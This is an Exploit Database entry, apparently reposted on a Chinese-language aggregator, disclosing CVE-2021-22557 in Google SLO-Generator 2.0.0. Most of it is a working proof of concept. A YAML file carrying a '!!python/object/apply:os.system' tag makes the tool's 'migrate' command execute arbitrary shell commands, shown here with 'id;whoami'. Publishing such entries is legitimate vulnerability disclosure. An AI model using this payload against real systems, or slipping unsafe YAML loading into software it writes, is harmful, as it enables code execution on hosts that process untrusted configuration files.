Google SLO-Generator 2.0.0 – Code Execution

• Exploit Database
• 40 阅读

• 作者： Kiran Ghimire
  日期： 2021-10-07
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/50385/

• # Exploit Title: Google SLO-Generator 2.0.0 - Code Execution
  # Date: 2021-09-28
  # Exploit Author: Kiran Ghimire
  # Software Link: https://github.com/google/slo-generator/releases
  # Version: <= 2.0.0
  # Tested on: Linux
  # CVE: CVE-2021-22557
  
  ##############################################################################
  
  *Introduction*:
  Is a tool to compute and export Service Level Objectives (SLOs), Error
  Budgets and Burn Rates, using configurations written in YAML (or JSON)
  format.
  
  ##############################################################################
  
  *POC:*
  1. pip3 install slo-generator==2.0.0
  2. 2. Save the below yaml code in a file as exploit.yaml.
   !!python/object/apply:os.system ["id;whoami"]
  3.Run the below command
   slo-generator migrate -b exploit.yaml
  ##############################################################################